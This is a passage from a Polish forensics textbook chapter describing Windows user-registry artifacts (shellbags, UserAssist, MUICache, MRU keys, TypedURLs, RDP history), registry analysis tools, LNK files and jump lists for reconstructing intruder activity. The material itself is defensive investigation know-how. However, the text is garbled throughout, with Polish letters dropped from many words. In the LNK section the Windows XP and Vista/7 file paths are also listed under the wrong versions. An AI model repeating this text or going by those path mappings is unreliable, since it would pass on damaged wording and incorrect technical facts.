widzielimy, jak szkodliwe programy wykonywane w kontekcie tych dwch kont zostawiay
lady w powizanych z nimi gaziach rejestru.
W tym miejscu opisujemy kilka kluczy z gazi uytkownikw, ktre naszym zdaniem s
najbardziej pomocne podczas ledztwa shellbag, UserAssist, MUICache, Most Recently Used
(MRU), TypedURLs oraz TypedPaths.
Klucze typu shellbag

Zauwaye, e system Windows zawsze otwiera okna Eksploratora Windows w taki sam sposb,
tzn. w tym samym rozmiarze, miejscu i z tak sam konfiguracj widoku? Jeli tak, to bye
wiadkiem dziaania klucza typu shellbag dane potrzebne tej funkcji s przechowywane
w specjalnym zestawie kluczy w gazi rejestru profilu uytkownika. Klucze te s ustawiane
za kadym razem, gdy uytkownik korzysta z lokalnego lub sieciowego folderu za pomoc
Eksploratora. Ponadto informacje te mog przetrwa nawet po tym, jak dany katalog zostanie
usunity. Klucze shellbag znajduj si w nastpujcych lokalizacjach.
Windows Vista, 7, Server 2008
HKEY_USERS\{SID}_Classes\Local Settings\Software\Microsoft\Windows\Shell\
HKEY_USERS\{SID}\Software\Microsoft\Windows\Shell\
HKEY_USERS\{SID}\Software\Microsoft\Windows\ShellNoRoam\
Analiza tych kluczy pozwala zdoby nastpujce informacje:

pene cieki do katalogw uywanych w Eksploratorze,
dat i godzin dostpu do kadej ze cieek, zdobyte jako czas ostatniej modyfikacji
odpowiedniego klucza, pod pewnymi warunkami (zobacz te ponisz uwag),
czasy modyfikacji, dostpu i utworzenia kadej cieki ledzonej w kluczach shellbag,
zarejestrowane w czasie, w ktrym wystpio zdarzenie dostpu.
Dowody z tego rda mog by bezcenne, gdy trzeba dowiedzie si, czy haker wchodzi
do okrelonych katalogw w celu kradziey danych, zmodyfikowania informacji czasowych
szkodliwych plikw lub po prostu sprawdzenia, co jest dostpne. Na rysunku 12.22 pokazano
przykad zdekodowanych dowodw z kluczy shellbag pobranych za pomoc skryptu w jzyku
Python o nazwie shellbags.py, ktrego opis zamiecilimy nieco dalej.
RYSUNEK 12.22. Zdekodowana zawarto kluczy rejestru shellbag
Uwaga Pamitaj o rnicy midzy zdekodowanymi datami w danych kluczy shellbag a czasem ostatniej
modyfikacji samego klucza. Ponadto musisz wiedzie, e z powodu duej zoonoci kluczy shellbag
czas ostatniej modyfikacji nie zawsze zgadza si z czasem dostpu do cieki. Dan Pullega napisa
na swoim blogu 4n6k doskona analiz kluczy shellbag, w ktrej znajdziesz wicej informacji
na ten temat (www.4n6k.com/2013/12/shellbags-forensics-addressing.html).
Struktura kluczy shellbag i ich zachowanie to do skomplikowane sprawy. Jednym z pierwszych

obszernych opracowa na temat dziaania kluczy shellbag jest artyku pt. Using shellbag information
to reconstruct user activities (Odtwarzanie aktywnoci uytkownikw na podstawie informacji z kluczy
shellbag) autorstwa Zhu, Gladysheva i Jamesa. Gorco polecamy jego lektur. Take Chad Tilbury
niedawno opublikowa studium na temat kluczy shellbag i systemu Windows we wpisie na swoim
blogu pt. Computer Forensic Artifacts: Windows 7 Shellbags (Artefakty przydatne w ledztwie:
klucze shellbag w systemie Windows 7).
Do analizy wartoci kluczy shellbag mona wykorzysta wiele darmowych i patnych narzdzi.
Poniej znajduje si lista darmowych powszechnie znanych programw, za pomoc ktrych mona
pobiera i dekodowa klucze shellbag z gazi NTUSER.DAT i USRCLASS.DAT. Zwracane przez
nie wyniki dobrze nadaj si do wykorzystania w osiach czasu obrazujcych aktywno hakera.
W INTERNECIE
Artyku opisujcy wyniki badania kluczy shellbag www.dfrws.org/2009/proceedings/p69-zhu.pdf
Wpis na blogu SANS computer-forensics.sans.org/blog/2011/07/05/shellbags
Skrypt shellbags.py Williego Ballenthina github.com/williballenthin/shellbags
sbag TZWorks www.tzworks.net/prototype_page.php?proto_id=14
UserAssist
Klucz ten rejestruje, ktre aplikacje uytkownik uruchomi za pomoc powoki Eksploratora
Windows:
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
Dane te s wykorzystywane do tworzenia listy czsto uruchamianych aplikacji w menu

startowym uytkownika. Zdekodowana zawarto kluczy UserAssist zawiera nastpujce
informacje:
pene cieki do wszystkich plikw wykonywalnych,
liczb uruchomie kadego programu,
czas ostatniego uruchomienia aplikacji.
Brzmi troch jak pliki pobierane z wyprzedzeniem? Rzeczywicie, mona mie takie skojarzenie.
Jedn z najwaniejszych rnic jest to, e klucze UserAssist rejestruj tylko elementy otwierane
przez Eksploratora Windows. Zaliczaj si do nich programy wczane za pomoc menu Uruchom
i pliki, do ktrych odnoniki s umieszczone w menu Start, ale nie zaliczaj si programy
uruchamiane za pomoc wiersza polece. Z drugiej strony pliki pobierane z wyprzedzeniem nie
dostarczaj informacji kontekstowych na temat tego, kto uruchomi okrelony program, ani czy
nastpio to podczas sesji interaktywnej, czy w innej sytuacji.
Podobnie jak klucze shellbag, wartoci i dane UserAssist trzeba zdekodowa, aby odczyta zawarte
w nich informacje. Nazwy wartoci po jednej dla kadego pliku wykonywalnego s zakodowanymi
algorytmem ROT13 penymi ciekami do odpowiadajcych im plikw. Na rysunku 12.23 pokazano
nieprzetworzon i zdekodowan tre przykadowego klucza UserAssist. Wpisy na tych zrzutach
ekranu nie s swoimi wzajemnymi odpowiednikami, poniewa zdekodowane informacje s
sortowane w inny sposb ni zakodowane.
Poniej znajduje si lista darmowych narzdzi, za pomoc ktrych mona dekodowa klucze
UserAssist w dziaajcym systemie lub z gazi rejestru NTUSER.DAT.
W INTERNECIE
UserAssistView firmy NirSoft http://www.nirsoft.net/utils/userassist_view.html
UserAssist Didiera Stevensa blog.didierstevens.com/2012/07/19/userassist-windows-2000-thru-windows-8/
RYSUNEK 12.23. Porwnanie nieprzetworzonych i zdekodowanych danych z klucza UserAssist
MUICache
Klucz rejestru MUICache jest kolejnym rdem informacji na temat programw uruchamianych
przez uytkownika. System Windows zapisuje w nim pene cieki do plikw wykonywalnych
i skryptw wsadowych uruchamianych przez Eksplorator (rysunek 12.24). Wartoci i dane klucza
MUICache s przechowywane w nastpujcych lokalizacjach.
Windows Vista, 7, Server 2008 HKEY_USERS\{SID}_Classes\Local Settings\
Software\Microsoft\Windows\Shell\MuiCache
Windows XP i Server 2003 HKEY_USERS\{SID}\Software\Microsoft\Windows\
ShellNoRoam\MUICache
RYSUNEK 12.24. Przykadowa zawarto klucza rejestru MUICache

Dane zwizane z kad wartoci zawieraj opis FileDescription pliku wykonywalnego z jego
sekcji Version Information Resources lub po prostu nazw pliku, jeli opis jest niedostpny.
Pamitaj, e FileDescription i inne acuchy PE Resource Version Information mona ustawi
na dowoln warto nic nie stoi na przeszkodzie, aby wirus wypeni te pola wartociami
wygldajcymi na legalne.
Cho przydatno tego klucza w ledztwach jest znana od do dawna, firma Microsoft
dostarcza niewiele informacji na jego temat. Nie jest jasne, czy liczba ledzonych plikw
wykonywalnych jest ograniczona, ani czy zmienia si w zalenoci od wersji systemu operacyjnego
Windows. Ponadto klucz MUICache, w odrnieniu od UserAssist i Prefetch, nie rejestruje czasu
ani czstotliwoci wykonywania.
Wartoci i dane klucza MUICache s czytelne, wic nie trzeba ich dekodowa za pomoc
adnych specjalnych narzdzi, aby je podda analizie. Firma NirSoft udostpnia darmowy program
o nazwie MUICacheView, za pomoc ktrego mona szybko przejrze zawarto tego klucza
w dziaajcym systemie.
W INTERNECIE
www.nirsoft.net/utils/muicache_view.html
Klucze dotyczce ostatnio uywanych plikw

Wszystkie skadniki i aplikacje systemu operacyjnego Windows mog ledzi ostatnio uywane
elementy (ang. most recently used MRU) za pomoc kluczy rejestru. Z listami takimi spotka si
kady, kto kiedykolwiek widzia menu Plik lub Otwrz z wykazem ostatnio otwieranych plikw
w programie. Jako e listy te zawieraj informacje o aktywnoci uytkownika, klucze MRU
s z reguy przechowywane w gaziach NTUSER.DAT, a nie oglnych gaziach systemowych.
Dla list MRU nie ma zdefiniowanych adnych standardowych cieek w rejestrze ani
wytycznych dotyczcych nadawania nazw. W efekcie w systemie mog znajdowa si setki takich
kluczy porozrzucanych po rnych miejscach, w zalenoci od tego, jakie programy zainstalowano.
Poniewa katalogowanie niezliczonej iloci narzdzi byoby bez sensu, postanowilimy skupi uwag
na kilku najwaniejszych podstawowych aplikacjach systemu Windows.
Listy ostatnio otwieranych i zapisywanych plikw

Eksplorator Windows zapisuje w kilku kluczach rejestru pod kluczem ComDlg32 informacje
o plikach i katalogach ostatnio uywanych poprzez menu Otwrz i Zapisz jako.
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\
OpenPidlMRU
LastVisitedPidlMRU
CIDSizeMRU

OpenSaveMRU
LastVisitedMRU
Wiele aplikacji wykorzystuje te okna dialogowe do wykonywania operacji plikowych, wic z informacji
tych mona wywnioskowa, czy wybrany uytkownik utworzy lub otworzy okrelony plik.
Klucz OpenSavePidlMRU (lub OpenSaveMRU w starszych wersjach systemu Windows) rejestruje
nazwy i cieki plikw otwieranych i zapisywanych przy uyciu okna dialogowego Zapisz jako
Eksploratora Windows. Klucz ten zawiera po jednym podkluczu dla kadego rozszerzenia pliku, z jakim
uytkownik mia wczeniej do czynienia np. (...)\OpenSavePidlMRU\docx\ zawiera list ostatnio
otwartych lub zapisanych plikw .docx. Podklucz wieloznaczny, (...)\OpenSavePidlMRU\*\, zawiera
list dwudziestu ostatnio otwieranych lub zapisywanych plikw bez wzgldu na rozszerzenie.
Klucz LastVisitedPidlMRU (lub LastVisitedMRU w starszych wersjach systemu Windows) rejestruje
programy, ktre spowodoway wywietlenie okien dialogowych Otwrz lub Zapisz jako oraz ostatnie
katalogi, do ktrych zagldano za pomoc tych okien. To wanie dziki tym informacjom programy
mog otwiera okna dialogowe Otwrz i Zapisz jako w tym samym katalogu, co poprzednio.
Klucz CIDSizeMRU (obecny od systemu Windows Vista) rejestruje rozmiar i pozycj na ekranie
okien dialogowych Eksploratora uruchamianych aplikacji.
Program RegRipper Harlana Carveya (regripper.wordpress.com) zawiera wtyczk o nazwie ComDlg32,
ktrej mona przekaza ga rejestru NTUSER.DAT, aby zidentyfikowa i przeanalizowa tre tych kluczy.
Lista ostatnio uruchamianych programw w menu Uruchom

Klucz ten rejestruje list aplikacji ostatnio uruchomionych za pomoc okna dialogowego Uruchom
z menu startowego:
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Znajdujce si w tym kluczu wartoci i dane s w czytelnym dla czowieka formacie tekstowym.
Na rysunku 12.25 pokazano przykadow tre klucza RunMRU z pewnego systemu, z ktrej wynika,
e uytkownik uruchamia programy ZoomIt64.exe, services.msc, cmd.exe (z argumentami) oraz iexplore.exe.
RYSUNEK 12.25. Przykadowa zawarto klucza rejestru RunMRU

RecentDocs
Klucz ten zawiera list ostatnio otwieranych plikw (nie tylko dokumentw, lecz z wszystkimi
rozszerzeniami) wykorzystywan w menu Plik rnych aplikacji:
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Wartoci znajdujce si w tym kluczu odzwierciedlaj pliki .lnk rejestrowane w katalogu

C:\Documents and Settings\%USERNAME%\Recent\. Usunicie jednego z tych plikw powoduje
nawet automatyczne skasowanie odpowiedniej wartoci z klucza RecentDocs.
Klucz RecentDocs ma te podklucze grupujce otwierane pliki wg rozszerze do dziesiciu
w kadej kategorii. Podobn struktur maj podklucze klucza OpenSavePidlMRU. Analiza wartoci
tych kluczy moe wykaza pliki, ktrych nie ma ju w systemie szczeglnie plikw o nietypowych
rozszerzeniach, ktrych miejsce w historii nie zostanie szybko zapenione innym wpisem
w procesie rotacji.
Klucze TypedURLs i TypedPaths Internet Explorera

Klucze te zawieraj list ostatnio otwieranych adresw URL, ktra jest wykorzystywana w menu
rozwijanym paska adresu przegldarki i przez funkcj automatycznego uzupeniania adresw.
Wszystkie wersje systemu Windows HKEY_USERS\{SID}\Software\Microsoft\
Internet Explorer\TypedURLs
Windows Vista i nowsze HKEY_USERS\{SID}\Software\Microsoft\
Internet Explorer\TypedPaths
Informacje z tego klucza dostarczaj dowodw na potwierdzenie tezy, e uytkownik celowo
wszed na okrelon stron (wpisa adres rcznie), a nie po prostu klikn przypadkiem odnonik.
Klucz TypedURLs rejestruje tylko te adresy URL, ktre zostay wprowadzone wprost do paska adresu
(przez wpisanie lub skopiowanie) albo wybrane z menu rozwijanego funkcji automatycznego
uzupeniania adresw. W kluczu tym nie s rejestrowane adresy URL kliknitych czy ani
zakadek. W wersjach Internet Explorera starszych od 10 system Windows rejestrowa w kluczu
TypedURLs maksymalnie dwadziecia pi wartoci od url1 (ostatnio otwarty adres) do url25,
z ktrych kada zawieraa jeden adres URL. W Internet Explorerze 10 i nowszych wersjach
maksimum podniesiono do pidziesiciu elementw. Dane w tych wartociach s w formacie
tekstowym czytelnym dla czowieka, wic nie trzeba ich dekodowa.
W wersjach Internet Explorera starszych od 10 klucze te nie zawieray informacji
pozwalajcych stwierdzi, kiedy warto url# zostaa dodana. Czas ostatniej modyfikacji klucza
TypedURLs jest aktualizowany po kadej zmianie ktrejkolwiek z jego wartoci podrzdnych, przez
co mona okreli tylko czas dostpu do ostatnio dodanego adresu URL. Natomiast w Internet
Explorerze 10 wprowadzono nowy klucz o nazwie TypedURLsTime przechowujcy zbiory wartoci
url# skojarzonych z danymi okrelajcymi czas dodania kadego adresu do klucza TypedURLs.
Na blogu The Digital Forensics Stream znajduje si ciekawy wpis opisujcy sposb dziaania klucza
TypedURLsTime: dfstream.blogspot.com/2012/05/windows-8-typedurlstime.html. Na rysunku 12.26
pokazano przykad zawartoci klucza TypedURLs.
RYSUNEK 12.26. Przykadowa zawarto klucza rejestru TypedURLs
Jeli przyjrzysz si zawartoci klucza TypedURLs w systemie Windows XP, wrd adresw URL
moesz z zaskoczeniem znale cieki lokalne (np. C:\Windows). Eksplorator Windows i Internet
Explorer s cile powizane, przez co system operacyjny rejestruje wpisywane bezporednio cieki
do katalogw lokalnych i UNC w taki sam sposb jak adresy internetowe. W zwizku z tym analiza
tego klucza pozwala czasami znale dowody na to, e uytkownik korzysta z okrelonych cieek,
cho bez szczegw, takich jak czas dostpu.
W systemach Windows Vista i nowszych w kluczu TypedURLs cieki lokalne i UNC nie s ju
rejestrowane. Firma Microsoft utworzya dla nich nowy klucz: HKEY_USERS\{SID}\Software\
Microsoft\Internet Explorer\TypedPaths. Struktura tego klucza jest taka sama jak klucza
TypedURLs: podwartoci maj nazwy url# w zakresie od 1 do 25, a url1 oznacza ostatnio
otwierany katalog.
Lista MRU pulpitu zdalnego

Narzdzie Podczanie pulpitu zdalnego (zwane te usugami terminalowymi i klientem serwera)
umoliwia ustanawianie sesji RDP (ang. Remote Desktop Protocol) w celu poczenia jednego
systemu Windows z innym. Aplikacja ta zapisuje informacje o ostatnich poczeniach i dane
konfiguracyjne kadego z nich w nastpujcych kluczach rejestru:
HKEY_USERS\{SID}\Software\Microsoft\Terminal Server Client\Default\,
HKEY_USERS\{SID} \Software\Microsoft\Terminal Server Client\Servers\.
W ledztwie informacje te mog stanowi dowody ruchu poziomego hakera do innych systemw.
Klucz \Terminal Server Client\Default\ zawiera wartoci o nazwach utworzonych wg wzoru
MRU#, przy czym MRU0 reprezentuje ostatnio uywany adres IP lub ostatnio uywan nazw hosta.
System Windows dodaje wpisy do tej listy tylko dla udanych pocze, tzn. jeli wpisany przez
uytkownika adres jest nieosigalny, nie zostanie zapisany.
Klucz Terminal Server Client\Servers\ zawiera po jednym podkluczu dla kadego adresu z listy
wartoci MRU w kluczu \Default\. Jeli np. warto \Terminal Server Client\Default\MRU0 jest
ustawiona na 192.168.1.1, mona si spodziewa take odpowiadajcego jej podklucza (\Terminal
Server Client\Servers\192.168.1.1\). Kady podklucz na ciece \Servers\ moe zawiera warto
UsernameHint z domyln nazw uytkownika dla zdalnego poczenia oraz warto CertHash,
jeli przy pierwszym poczeniu zdalny system dostarczy certyfikat. W efekcie z kluczy tych mona
si dowiedzie, z czym uytkownik prbowa nawiza poczenie RDP i jako kto prbowa si
zalogowa. Czas ostatniej modyfikacji podkluczy klucza \Servers\ moe wskazywa dat ostatniej
aktualizacji danych konfiguracyjnych wybranego adresu.
Narzdzia do analizy rejestru

Narzdzia do analizy rejestru mona podzieli na dwie szerokie kategorie programy do
przetwarzania i dekodowania wielu rnych typw dowodw oraz programy do badania jednego
artefaktu znajdowanego w rejestrze. Zazwyczaj prac lepiej zaczyna od pierwszego rodzaju
aplikacji. S to kompleksowe rozwizania przydatne, gdy nie do koca wiadomo, czego szuka,
lub gdy nie chce si bawi z wieloma rnymi skryptami i innymi narzdziami do analizy
materiau dowodowego. Niemniej jednak zawsze warto porwna wyniki otrzymane z kilku
narzdzi, aby mie pewno, e s prawidowe i kompletne.
Poniej przedstawiamy list darmowych programw do analizowania wielu rnych artefaktw
w rejestrze systemu Windows.
RegRipper regripper.wordpress.com
Utworzona przez Harlana Carveya aplikacja RegRipper naley do najczciej uywanych
narzdzi do analizy rejestru na potrzeby ledztw. Program ten bazuje na wtyczkach,
z ktrych cz jest czsto aktualizowana przez samego Harveya i innych czonkw
spoecznoci Digital Forensics and Incident Response (DFIR). Rozpoznaje on i dekoduje
wiele artefaktw rejestrowych zarwno z gazi systemowych, jak i uytkownikw.
Za pomoc programu RegRipper mona przetwarza prawie kade rdo danych z rejestru
opisane w tym podrozdziale (i wiele innych, o ktrych nie napisalimy z powodu braku
miejsca). W niektrych przypadkach lepsze mog okaza si specjalistyczne narzdzia,
ktre przyjmuj wicej formatw danych wejciowych lub zwracaj rzetelniejsze wyniki
(np. do przetwarzania kluczy Application Compatibility Cache wolimy uywa aplikacji
ShimCacheParser). Mimo to, trudno znale inne narzdzie dorwnujce temu
programowi wygod dla uytkownika i poziomem pomocy technicznej.
Windows Registry Decoder www.digitalforensicssolutions.com/registrydecoder
Program Registry Decoder rwnie bazuje na wtyczkach, ktre mona podcza
do jednolitego interfejsu uytkownika. Cho rozpoznaje skromniejsz liczb artefaktw
rejestru ni RegRipper, to obsuguje najwaniejsze rda dowodw, takie jak najczciej
uywane klucze automatycznego uruchamiania, klucze konfiguracji systemu, klucze shellbag
oraz inne lady interaktywnych dziaa uytkownika. Ponadto aplikacja ta umoliwia
przeszukiwanie zawartoci gazi rejestru oraz zdekodowanych lub przetworzonych
wynikw zwracanych przez jej rne wtyczki (cho czasami bywa niestabilna).
Ostatnia aktualizacja programu Registry Decoder miaa miejsce pod koniec 2012 roku
(na czas pisania tej ksiki).
AutoRuns technet.microsoft.com/en-us/sysinternals/bb963902
Program AutoRuns i towarzyszce mu narzdzie konsolowe o nazwie autorunsc
to skadniki popularnego pakietu SysInternals firmy Microsoft. Wprawdzie nie jest
to narzdzie cile przeznaczone do analizy rejestru, za jego pomoc mona znale
i skonsolidowa wiele mechanizmw trwaoci w systemie Windows wcznie
z mnstwem kluczy, o ktrych bya mowa wczeniej w tym podrozdziale. Ponadto
aplikacja ta sprawdza podpisy cyfrowe, oblicza skrty oraz pobiera informacje o zasobach
cyfrowych (np. o nazwie wydawcy) wszystkich trwaych plikw wykonywalnych. Dziki
tym wszystkim funkcjom program znacznie uatwia identyfikowanie szkodliwych regu
automatycznego uruchamiania. Naley jednak pamita, e narzdzie AutoRuns pracuje
tylko na dziaajcych systemach, tzn. nie da si z jego pomoc analizowa martwych
gazi rejestru pobranych do analizy ani obrazw wykonanych na potrzeby ledztwa.
Redline www.mandiant.com/resources/download/redline
Narzdzie do analizy na ywo Redline firmy Mandiant zawiera kilka moduw
inspekcyjnych, dostpnych podczas budowy skryptu kolektora, za pomoc ktrych mona
przeanalizowa i przetworzy rejestr. Modu do obsugi rejestru Registry zwraca zwyk
tabel z wykazem wszystkich kluczy, wartoci i danych wraz z czasami ostatniej modyfikacji
kluczy. Modu Services czy informacje o usugach z Menedera kontroli usug, rejestru
i systemu plikw umoliwia to sprawdzenie skrtw MD5 i podpisw cyfrowych plikw
binarnych usug, podgldanie ich stanu dziaania i identyfikatorw procesw oraz zbadanie
innych atrybutw, takich jak opis i nazwa. W kocu modu Persistence dziaa podobnie jak
narzdzie AutoRuns z pakietu SysInternals. Znajduje wiele kluczy rejestru automatycznego
uruchamiania (jak rwnie pewne inne mechanizmy trwaoci niezwizane z rejestrem),
bada wskazywane przez nie pliki binarne oraz dostarcza rnych metadanych, takich jak
znaczniki czasu, skrty i informacje o podpisach cyfrowych. Wszystkie te trzy moduy
pracuj tylko w dziaajcym systemie, tzn. nie da si przy ich uyciu przetwarza danych
z gazi rejestru pobranych do analizy. Ponadto naley wiedzie, e program Redline
standardowo nie dekoduje adnych innych typw kluczy rejestru oprcz kluczy
dotyczcych usug i automatycznego uruchamiania programw.
W kilku miejscach tego podrozdziau wspominalimy o rnych samodzielnych
specjalistycznych narzdziach analitycznych. W wielu przypadkach lepiej wykonuj one zadanie,
do ktrego zostay utworzone, ni bardziej oglne aplikacje, a przynajmniej maj wicej opcji
wejciowych i wyjciowych. Poniej przedstawiamy list narzdzi, o ktrych bya ju mowa,
oraz kilka nowych.
ShimCacheParser github.com/mandiant/ShimCacheParser
Skrypt w jzyku Python do analizy bufora danych o zgodnoci aplikacji. Przyjmuje dane
w wielu formatach, wcznie z martwymi gaziami rejestru, gaziami systemowymi,
binarnymi danymi klucz-warto oraz danymi w formatach Mandiant Intelligent Response
i Redline Collector.
shellbags.py github.com/williballenthin/shellbags
Skrypt w jzyku Python do analizowania artefaktw shellbag powstaych podczas
interaktywnego korzystania z Eksploratora Windows. Przetwarza tylko martwe
i pobrane w obrazach gazie rejestru.
sbag www.tzworks.net/prototype_page.php?proto_id=14
Kolejne narzdzie do analizy kluczy shellbag. Naley wiedzie, e na razie licencja narzdzi
TZWorks pozwala tylko na uywanie ich do niekomercyjnych celw osobistych.
UserAssist Didiera Stevensa blog.didierstevens.com/2012/07/19/
userassist-windows-2000-thru-windows-8/
Narzdzie do analizowania klucza rejestru UserAssist z gazi uytkownika.
Nirsoft Registry Analysis Tools
www.nirsoft.net/windows_registry_tools.html
www.nirsoft.net/utils/muicache_view.html
www.nirsoft.net/utils/shell_bags_view.html
www.nirsoft.net/utils/userassist_view.html
www.nirsoft.net/utils/iecompo.html
Firma NirSoft udostpnia duy pakiet darmowych narzdzi do przeprowadzania ekspertyz.
Ich programy do pracy z rejestrem umoliwiaj analizowanie kluczy MUICache, ShellBags oraz
UserAssist, jak rwnie obiektw COM Internet Explorera. Wszystkie te aplikacje dziaaj tylko
w systemie Windows oraz wywietlaj informacje wycznie z gazi rejestru biecego systemu,
tzn. nie przetwarzaj martwych gazi rejestru.
INNE LADY SESJI INTERAKTYWNYCH

W podrozdziale o dziennikach zdarze opisalimy rne sposoby logowania uytkownikw
w systemie Windows i kody typu logowania rejestrowane w dzienniku zabezpiecze. Cz
typw dostpu sklasyfikowalimy jako interaktywne, tzn. wykorzystujce graficzny interfejs
uytkownika systemu Windows, a nie ograniczone do wiersza polece. Cho rodzaj interaktywny
dotyczy konkretnego typu logowania (2), gdy uytkownik korzysta z konsoli, na potrzeby tego
rozdziau terminem tym okrelamy te sesje Pulpitu zdalnego (typ logowania 10) oraz udostpniania
ekranu (np. przez VNS lub podobne programy).
W podrozdziale Rejestr systemu Windows znajduje si podpunkt zatytuowany Klucze rejestru
w gaziach uytkownikw, w ktrym opisalimy wiele kluczy tworzonych i modyfikowanych,
gdy uytkownik interaktywnie loguje si w systemie. Klucze te pomagaj w utrzymywaniu stanu
profilu uytkownika midzy poszczeglnymi logowaniami. Jednak wystpowanie ladw interaktywnego
korzystania z systemu nie ogranicza si do rejestru. System Windows zapisuje take pewne artefakty
w systemie plikw wikszo z nich jest zwizana z konkretnym profilem uytkownika lub
identyfikatorem SID ktre s wykorzystywane przez rne funkcje systemu operacyjnego. Jeeli
haker zdobdzie interaktywny dostp do systemu, artefakty te pomog nam lepiej zorientowa si,
jakie byy jego poczynania.
Pliki LNK
Pliki skrtw systemu Windows, zwane te plikami czy ze wzgldu na rozszerzenie .lnk, peni rol
wskanikw do innych plikw lub folderw w systemie. Rni si one od dowiza symbolicznych
tym, e su tylko jako rozszerzenia dla Eksploratora Windows, podczas gdy dowizania symboliczne
s niewidoczne dla aplikacji i mog by traktowane przez programy jak pliki docelowe.
Pliki czy mog zosta utworzone na kilka sposobw, np. przez uytkownika korzystajcego
z opcji Utwrz skrt w menu kontekstowym wywietlanym po klikniciu pliku prawym przyciskiem
myszy. Czynno ta powoduje wygenerowanie pliku cza o nazwie [nazwa pliku oryginalnego]
skrt.lnk w tym samym katalogu. Ponadto system Windows moe automatycznie generowa
skrty, ktre zapisuje w katalogu profilu uytkownika, gdy plik zostanie otwarty w Eksploratorze.
W kocu pakiet Microsoft Office tworzy wasny zestaw plikw czy do ostatnio otwieranych
dokumentw w profilu uytkownika.
Dowody
Pliki czy zawsze maj rozszerzenie .lnk i mona je znale w nastpujcych miejscach.
Windows Vista, 7 i 2008
C:\Documents and Settings\%USERNAME%\Recent\
C:\Documents and Settings\%USERNAME%\Application Data\Microsoft\Office\Recent\
Windows XP i 2000
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Office\Recent\
Analiza
Pliki czy nie s tylko prostymi odnonikami do innych plikw znajdujcych si na dysku.
Zawieraj dodatkowo due iloci informacji przydatnych w ledztwie. W kadym takim pliku
znajduj si nastpujce metadane dotyczce pliku, ktry wskazuje:
pena cieka do pliku (z czasu, gdy by tworzony odnonik);
nazwa udziau sieciowego (jeli plik docelowy pochodzi z takiego rda);
numer seryjny woluminu docelowego;
atrybuty i rozmiar logiczny;
standardowe znaczniki czasu modyfikacji, dostpu i utworzenia wskazywanego pliku
z chwili jego ostatniego otwarcia;
identyfikator obiektu (ObjectID), przechowywany take w rekordzie MFT pliku docelowego
i wykorzystywany przez usug ledzenia czy rozproszonych.
Dane te pozwalaj dowiedzie si, co uytkownik (lub haker) robi podczas interaktywnej sesji
szczeglnie, gdy poczy si je z innymi rdami dowodw i osi czasu. Przykadowo niedawno
pracowalimy przy sprawie wamania, w ktrej haker uzyska dostp do serwera przez Pulpit zdalny
i za pomoc przegldarki Internet Explorer dosta si do wewntrznego portalu firmy. W cigu kilku
godzin intruz pobra i zbada rne dokumenty programw Word i Excel z witryny. Otwarcie kadego
z tych plikw pozostawio lad w postaci pliku cza. Wszystkie te lady stanowiy swoisty zapis
jego aktywnoci. Mona byo sprawdzi, co haker oglda, kiedy pobrane pliki zostay utworzone
i otwarte oraz gdzie pliki te byy tymczasowo przechowywane. Pliki czy pozostay w systemie
nawet mimo wysiku, jaki haker woy w zacieranie ladw poprzez skasowanie historii
przegldarki internetowej i usunicie skopiowanych i pobranych plikw przed wylogowaniem.
Cho pliki LNK zawieraj czytelne dla czowieka acuchy tekstu i mog by analizowane
w edytorze szesnastkowym, zalecamy korzystanie ze specjalnych narzdzi rozpoznajcych ich
format i wywietlajcych zdekodowane informacje. Jest kilka komercyjnych programw, ktre
potrafi to robi, np. AccessData FTK i EnCase firmy Guidance. A to darmowe aplikacje tego typu.
W INTERNECIE
TZWorks lp tzworks.net/prototype_page.php?proto_id=11
Simple File Parser code.google.com/p/simple-file-parser/
Listy szybkiego dostpu

W systemie Windows 7 dodano now funkcj do nawigacji w pasku zada listy dostpu.
Kliknicie prawym przyciskiem myszy ikony w pasku zada powoduje wywietlenie menu z list
ostatnio uywanych elementw, czsto uywanych elementw oraz opcji typowych dla danej
aplikacji. Przykadowo program Microsoft Outlook zapewnia skrty pozwalajce utworzy now
wiadomo e-mail, spotkanie, zadanie oraz kontakt. Program Microsoft Word dostarcza list
ostatnio otwieranych plikw. S to przykady automatycznych list szybkiego dostpu, czyli takich,
ktre s automatycznie sporzdzane przez system operacyjny i aplikacje. Dodatkowo niektre
programy umoliwiaj przypinanie ostatnio otwieranych elementw do list szybkiego dostpu,
aby zostay zachowane w menu s to listy szybkiego dostpu uytkownika.
Na rysunku 12.27 pokazano wyniki wywietlone przez program JumpLister, czyli narzdzie
do analizowania dowodw z list szybkiego dostpu, ktrego opis zamiecilimy dalej w tym
podrozdziale. Jak wida, aplikacja wykrya dwa dokumenty programu Word o nazwach
Secrets.docx i More Secrets.docx.
Dowody
Dane list szybkiego dostpu s przechowywane w plikach z rozszerzeniami .automaticDestinations-ms
i .customDestinations-ms w nastpujcych katalogach:
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations,
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations.
RYSUNEK 12.27. Wynik analizy listy szybkiego dostpu przez program JumpLister
Szesnacie pierwszych znakw nazwy pliku listy szybkiego dostpu moe odpowiada
identyfikatorowi aplikacji. Jako e wikszo z tych identyfikatorw oblicza system operacyjny,
s one takie same we wszystkich systemach. Na stronach Forensics Wiki mona znale listy
identyfikatorw popularnych aplikacji www.forensicswiki.org/wiki/List_of_Jump_List_IDs.
Analiza
Listy szybkiego dostpu mog by kolejnym rdem informacji o obiektach ostatnio uywanych
przez uytkownika zalogowanego interaktywnie w systemie. Podczas prowadzonych ledztw czsto
szukamy ladw ostatnio otwieranych katalogw wanie na listach szybkiego dostpu Eksploratora
Windows. Lista szybkiego dostpu Pulpitu zdalnego zawiera dane o ostatnich poczeniach, ktre
pozwalaj odtworzy ewentualn aktywno poziom hakera z systemu, ktrego zabezpieczenia udao
mu si zama. Natomiast z list szybkiego dostpu aplikacji uywanych do pracy, takich jak np.
pakiet Microsoft Office (a nawet Notatnik), mona dowiedzie si, jakie pliki byy otwierane
w czasie aktywnoci hakera. Informacje te mona porwna (lub uzupeni) z dodatkowymi
rdami, takimi jak klucze shellbag, klucze rejestru z rejestrem ostatnio uywanych elementw
oraz pliki LNK.
